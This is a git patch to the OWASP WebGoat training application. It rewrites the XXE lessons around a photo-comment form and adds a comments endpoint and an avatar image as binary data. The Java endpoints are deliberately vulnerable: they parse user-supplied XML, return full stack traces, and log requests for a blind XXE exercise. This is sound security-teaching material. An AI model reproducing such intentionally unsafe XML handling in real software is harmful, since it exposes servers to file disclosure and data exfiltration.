From 6f0f71b1312080cc7f64140abe9f4df4e7d3d03e Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 4 May 2017 06:25:11 +0200
Subject: [PATCH] Changed XXE lessons to use photo comment example

---
 .../plugin/BlindSendFileAssignment.java       |  17 +-
 .../webgoat/plugin/CommentsEndpoint.java      |  30 ++++
 .../webgoat/plugin/ContentTypeAssignment.java |  60 +++++--
 .../java/org/owasp/webgoat/plugin/Ping.java   |   2 +-
 .../org/owasp/webgoat/plugin/SimpleXXE.java   |  37 ++--
 .../xxe/src/main/resources/html/XXE.html      | 165 +++++++++---------
 .../xxe/src/main/resources/images/avatar1.png | Bin 0 -> 28394 bytes
 .../xxe/src/main/resources/js/xxe.js          |  79 +++++++--
 .../resources/lessonPlans/en/XXE_blind.adoc   |  15 +-
 9 files changed, 250 insertions(+), 155 deletions(-)
 create mode 100644 webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/CommentsEndpoint.java
 create mode 100644 webgoat-lessons/xxe/src/main/resources/images/avatar1.png

diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
index 1896cad1f..3214757c6 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
@@ -6,6 +6,8 @@ import org.apache.commons.lang.exception.ExceptionUtils;
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentPath;
 import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.session.WebSession;
+import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.core.io.ClassPathResource;
 import org.springframework.http.MediaType;
@@ -51,11 +53,15 @@ import java.util.List;
  * @version $Id: $Id
  * @since November 18, 2016
  */
-@AssignmentPath("XXE/blind")
+@AssignmentPath("xxe/blind")
 public class BlindSendFileAssignment extends AssignmentEndpoint {
 
     @Value("${webgoat.user.directory}")
     private String webGoatHomeDirectory;
+    @Autowired
+    private WebSession webSession;
+    @Autowired
+    private Comments comments;
 
     @PostConstruct
     @SneakyThrows
@@ -70,10 +76,11 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
 
     @RequestMapping(method = RequestMethod.POST, consumes = MediaType.ALL_VALUE, produces = MediaType.APPLICATION_JSON_VALUE)
     @ResponseBody
-    public AttackResult createNewUser(@RequestBody String userInfo) throws Exception {
+    public AttackResult createNewUser(@RequestBody String commentStr) throws Exception {
         String error = "Parsing successful contents not send to server";
         try {
-            //parseXml(userInfo);
+            Comment comment = comments.parseXml(commentStr);
+            comments.addComment(comment, false);
         } catch (Exception e) {
             error = ExceptionUtils.getFullStackTrace(e);
         }
@@ -83,9 +90,9 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
         boolean solved = lines.stream().filter(l -> l.contains("WebGoat 8 rocks...")).findFirst().isPresent();
         logFile.delete();
         if (solved) {
-            return success().output("xxe.blind.output").outputArgs(Joiner.on('\n').join(lines)).build();
+            return trackProgress(success().output("xxe.blind.output").outputArgs(Joiner.on('\n').join(lines)).build());
         } else {
-            return failed().output(error).build();
+            return trackProgress(failed().output(error).build());
         }
     }
 
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/CommentsEndpoint.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/CommentsEndpoint.java
new file mode 100644
index 000000000..a46326f44
--- /dev/null
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/CommentsEndpoint.java
@@ -0,0 +1,30 @@
+package org.owasp.webgoat.plugin;
+
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.http.MediaType;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
+
+import java.util.Collection;
+
+import static org.springframework.web.bind.annotation.RequestMethod.GET;
+
+/**
+ * @author nbaars
+ * @since 5/4/17.
+ */
+@RestController
+@RequestMapping("xxe/comments")
+public class CommentsEndpoint {
+
+    @Autowired
+    private Comments comments;
+
+    @RequestMapping(method = GET, produces = MediaType.APPLICATION_JSON_VALUE)
+    @ResponseBody
+    public Collection<Comment> retrieveComments() {
+        return comments.getComments();
+    }
+
+}
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
index be850944e..96d470c87 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
@@ -1,14 +1,17 @@
 package org.owasp.webgoat.plugin;
 
-import com.fasterxml.jackson.databind.ObjectMapper;
+import org.apache.commons.exec.OS;
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentHints;
 import org.owasp.webgoat.assignments.AssignmentPath;
 import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.session.WebSession;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.*;
 
-import java.io.IOException;
+import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
 
 /**
  * ************************************************************************************************
@@ -39,37 +42,56 @@ import java.io.IOException;
  * @version $Id: $Id
  * @since November 17, 2016
  */
-@AssignmentPath("XXE/content-type")
+@AssignmentPath("xxe/content-type")
 @AssignmentHints({"xxe.hints.content.type.xxe.1", "xxe.hints.content.type.xxe.2"})
 public class ContentTypeAssignment extends AssignmentEndpoint {
 
+    private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "opt", "var"};
+    private final static String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files"};
+
+
+    @Value("${webgoat.server.directory}")
+    private String webGoatHomeDirectory;
+    @Autowired
+    private WebSession webSession;
+    @Autowired
+    private Comments comments;
+
     @RequestMapping(method = RequestMethod.POST, consumes = MediaType.ALL_VALUE, produces = MediaType.APPLICATION_JSON_VALUE)
     @ResponseBody
-    public AttackResult createNewUser(@RequestBody String userInfo, @RequestHeader("Content-Type") String contentType) throws Exception {
-        User user = new User();
+    public AttackResult createNewUser(@RequestBody String commentStr, @RequestHeader("Content-Type") String contentType) throws Exception {
         AttackResult attackResult = failed().build();
-        if (MediaType.APPLICATION_JSON_VALUE.equals(contentType)) {
-            user = parseJson(userInfo);
+        Comment comment = null;
+        if (APPLICATION_JSON_VALUE.equals(contentType)) {
+            comment = comments.parseJson(commentStr);
+            comments.addComment(comment, true);
             attackResult = failed().feedback("xxe.content.type.feedback.json").build();
         }
+
         if (MediaType.APPLICATION_XML_VALUE.equals(contentType)) {
-          //  user = parseXml(userInfo);
-            attackResult = failed().feedback("xxe.content.type.feedback.xml").build();
+            String error = "";
+            try {
+                comment = comments.parseXml(commentStr);
+                comments.addComment(comment, false);
+            } catch (Exception e) {
+                error = org.apache.commons.lang.exception.ExceptionUtils.getFullStackTrace(e);
+            }
+            attackResult = failed().feedback("xxe.content.type.feedback.xml").output(error).build();
         }
 
-//        if (checkSolution(user)) {
-//            attackResult = success().output("xxe.content.output").outputArgs(user.getUsername()).build();
-//        }
-        return attackResult;
+        if (checkSolution(comment)) {
+            attackResult = success().build();
+        }
+        return trackProgress(attackResult);
     }
 
-    private User parseJson(String userInfo) {
-        ObjectMapper mapper = new ObjectMapper();
-        try {
-            return mapper.readValue(userInfo, User.class);
-        } catch (IOException e) {
-            return new User();
+    private boolean checkSolution(Comment comment) {
+        String[] directoriesToCheck = OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
+        boolean success = true;
+        for (String directory : directoriesToCheck) {
+            success &= comment.getText().contains(directory);
         }
+        return success;
     }
 
 }
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/Ping.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/Ping.java
index 6ef28f863..ec37961f7 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/Ping.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/Ping.java
@@ -58,7 +58,7 @@ public class Ping extends Endpoint {
     public String logRequest(@RequestHeader("User-Agent") String userAgent, @RequestParam(required = false) String text) {
         String logLine = String.format("%s %s %s", "GET", userAgent, text);
         log.debug(logLine);
-        File logFile = new File(webGoatHomeDirectory, "/XXE/log.txt");
+        File logFile = new File(webGoatHomeDirectory, "/XXE/log.tdxt");
         try {
             try (PrintWriter pw = new PrintWriter(logFile)) {
                 pw.println(logLine);
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/SimpleXXE.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/SimpleXXE.java
index d5c6b6a82..f1f5bdfc3 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/SimpleXXE.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/SimpleXXE.java
@@ -1,24 +1,20 @@
 package org.owasp.webgoat.plugin;
 
 import org.apache.commons.exec.OS;
+import org.apache.commons.lang.exception.ExceptionUtils;
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentHints;
 import org.owasp.webgoat.assignments.AssignmentPath;
 import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.WebSession;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
-import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.RequestHeader;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-import java.util.Collection;
-
 import static org.springframework.http.MediaType.ALL_VALUE;
 import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
-import static org.springframework.web.bind.annotation.RequestMethod.GET;
 import static org.springframework.web.bind.annotation.RequestMethod.POST;
 
 /**
@@ -65,35 +61,22 @@ public class SimpleXXE extends AssignmentEndpoint {
     @Value("${webgoat.server.directory}")
     private String webGoatHomeDirectory;
     @Autowired
-    private WebSession webSession;
-    @Autowired
     private Comments comments;
 
-    @RequestMapping(method = GET, produces = MediaType.APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public Collection<Comment> retrieveComments() {
-        return comments.getComments();
-    }
-
     @RequestMapping(method = POST, consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
     @ResponseBody
     public AttackResult createNewComment(@RequestBody String commentStr, @RequestHeader("Content-Type") String contentType) throws Exception {
-        Comment comment = null;
-        if (APPLICATION_JSON_VALUE.equals(contentType)) {
-            comment = comments.parseJson(commentStr);
-            comments.addComment(comment, true);
-        }
-        if (MediaType.APPLICATION_XML_VALUE.equals(contentType)) {
-            //Do not show these comments to all users
-            comment = comments.parseXml(commentStr);
+        String error = "";
+        try {
+            Comment comment = comments.parseXml(commentStr);
             comments.addComment(comment, false);
+            if (checkSolution(comment)) {
+                return trackProgress(success().build());
+            }
+        } catch (Exception e) {
+            error = ExceptionUtils.getFullStackTrace(e);
         }
-        if (checkSolution(comment)) {
-            return trackProgress(success()
-                    .output("xxe.simple.output")
-                    .outputArgs(webSession.getUserName()).build());
-        }
-        return trackProgress(failed().build());
+        return trackProgress(failed().output(error).build());
     }
 
     private boolean checkSolution(Comment comment) {
diff --git a/webgoat-lessons/xxe/src/main/resources/html/XXE.html b/webgoat-lessons/xxe/src/main/resources/html/XXE.html
index 7d79b58d3..2ad34cf5d 100644
--- a/webgoat-lessons/xxe/src/main/resources/html/XXE.html
+++ b/webgoat-lessons/xxe/src/main/resources/html/XXE.html
@@ -48,13 +48,13 @@
                 </div>
                 <div class="post-footer">
                     <div class="input-group">
-                        <input class="form-control" id="commentInput" placeholder="Add a comment" type="text"/>
+                        <input class="form-control" id="commentInputSimple" placeholder="Add a comment" type="text"/>
                         <span class="input-group-addon">
-                                <i id="postComment" class="fa fa-edit" style="font-size: 20px"></i>
+                                <i id="postCommentSimple" class="fa fa-edit" style="font-size: 20px"></i>
                             </span>
                     </div>
                     <ul class="comments-list">
-                        <div id="comments_list">
+                        <div id="commentsListSimple">
                         </div>
                     </ul>
                 </div>
@@ -68,111 +68,112 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-    <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-    which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
     <div class="adoc-content" th:replace="doc:XXE_changing_content_type.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
-        <!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat -->
-        <!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
-        <!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
-        <form class="attack-form" accept-charset="UNKNOWN" prepareData="registerJson" method="POST" name="form"
-              action="/WebGoat/XXE/content-type" contentType="application/json">
-            <div id="lessonContent">
-                <strong>Registration form</strong>
-                <form prepareData="registerJson" accept-charset="UNKNOWN" method="POST" name="form" action="#attack/307/100">
-                    <table>
-                        <tr>
-                            <td>Username</td>
-                            <td><input name="username" value="" type="TEXT"/></td>
-                        </tr>
-                        <tr>
-                            <td>E-mail</td>
-                            <td><input name="email" value="" type="TEXT"/></td>
-                        </tr>
-                        <tr>
-                            <td>Password</td>
-                            <td><input name="email" value="" type="TEXT"/></td>
-                        </tr>
-                        <tr>
-                            <td></td>
-                            <td align="right"><input type="submit" value="Sign up"/></td>
-                        </tr>
-                    </table>
-                    <br/>
-                    <br/>
-                </form>
-                <div class="attack-feedback"></div>
-                <div class="attack-output"></div>
+        <div class="container-fluid">
+            <div class="panel post">
+                <div class="post-heading">
+                    <div class="pull-left image">
+                        <img th:src="@{/images/avatar1.png}"
+                             class="img-circle avatar" alt="user profile image"/>
+                    </div>
+                    <div class="pull-left meta">
+                        <div class="title h5">
+                            <a href="#"><b>John Doe</b></a>
+                            uploaded a photo.
+                        </div>
+                        <h6 class="text-muted time">24 days ago</h6>
+                    </div>
+                </div>
+
+                <div class="post-image">
+                    <img th:src="@{images/cat.jpg}" class="image" alt="image post"/>
+                </div>
+
+                <div class="post-description">
+
+                </div>
+                <div class="post-footer">
+                    <div class="input-group">
+                        <input class="form-control" id="commentInputContentType" placeholder="Add a comment" type="text"/>
+                        <span class="input-group-addon">
+                                <i id="postCommentContentType" class="fa fa-edit" style="font-size: 20px"></i>
+                            </span>
+                    </div>
+                    <ul class="comments-list">
+                        <div id="commentsListContentType">
+                        </div>
+                    </ul>
+                </div>
             </div>
-        </form>
+        </div>
+
+        <br/>
+        <div class="attack-feedback"></div>
+        <div class="attack-output"></div>
     </div>
 </div>
 
 
 <div class="lesson-page-wrapper">
-    <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-    <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-    which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
     <div class="adoc-content" th:replace="doc:XXE_overflow.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-    <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-    which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
     <div class="adoc-content" th:replace="doc:XXE_blind.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-    <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-    which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
     <div class="adoc-content" th:replace="doc:XXE_blind_assignment.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
-        <!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat -->
-        <!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
-        <!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
-        <form class="attack-form" accept-charset="UNKNOWN" prepareData="register" method="POST" name="form"
-              action="/WebGoat/XXE/blind" contentType="application/xml">
-            <div id="lessonContent">
-                <strong>Registration form</strong>
-                <form prepareData="register" accept-charset="UNKNOWN" method="POST" name="form" action="#attack/307/100">
-                    <table>
-                        <tr>
-                            <td>Username</td>
-                            <td><input name="username" value="" type="TEXT"/></td>
-                        </tr>
-                        <tr>
-                            <td>E-mail</td>
-                            <td><input name="email" value="" type="TEXT"/></td>
-                        </tr>
-                        <tr>
-                            <td>Password</td>
-                            <td><input name="email" value="" type="TEXT"/></td>
-                        </tr>
-                        <tr>
-                            <td></td>
-                            <td align="right"><input type="submit" value="Sign up"/></td>
-                        </tr>
-                    </table>
-                    <br/>
-                    <br/>
-                </form>
-                <div class="attack-feedback"></div>
-                <div class="attack-output"></div>
+        <div class="container-fluid">
+            <div class="panel post">
+                <div class="post-heading">
+                    <div class="pull-left image">
+                        <img th:src="@{/images/avatar1.png}"
+                             class="img-circle avatar" alt="user profile image"/>
+                    </div>
+                    <div class="pull-left meta">
+                        <div class="title h5">
+                            <a href="#"><b>John Doe</b></a>
+                            uploaded a photo.
+                        </div>
+                        <h6 class="text-muted time">24 days ago</h6>
+                    </div>
+                </div>
+
+                <div class="post-image">
+                    <img th:src="@{images/cat.jpg}" class="image" alt="image post"/>
+                </div>
+
+                <div class="post-description">
+
+                </div>
+                <div class="post-footer">
+                    <div class="input-group">
+                        <input class="form-control" id="commentInput" placeholder="Add a comment" type="text"/>
+                        <span class="input-group-addon">
+                                <i id="postCommentBlind" class="fa fa-edit" style="font-size: 20px"></i>
+                            </span>
+                    </div>
+                    <ul class="comments-list">
+                        <div id="commentsListBlind">
+                        </div>
+                    </ul>
+                </div>
             </div>
-        </form>
+        </div>
+
+        <br/>
+        <div class="attack-feedback"></div>
+        <div class="attack-output"></div>
     </div>
 </div>
 
 
 <div class="lesson-page-wrapper">
-    <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-    <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-    which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
     <div class="adoc-content" th:replace="doc:XXE_mitigation.adoc"></div>
 </div>
 
diff --git a/webgoat-lessons/xxe/src/main/resources/images/avatar1.png b/webgoat-lessons/xxe/src/main/resources/images/avatar1.png
new file mode 100644
index 0000000000000000000000000000000000000000..4ea864f90009013d7d30ea3fb8c70b1f49c7e4b8
GIT binary patch
literal 28394
zcmeI(<yRZe8z}JL?#10(Bv^rB#fk=ZcPkn!XekcGic4{Kx8R|;6k4=+fa31X_wu{<
zocmYsBFT%{otfRUJDGXr`FvATk;B2HzytsQI12KgG+ut^|Mx*hefj?OrN0>f5ENDT
zB&p@Sc=YAQ>&<*i$#bO7-o&Gu?VKUsO?QUKLA9X!NhjL%0D`5Zr6Vlefig3uH=W86
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
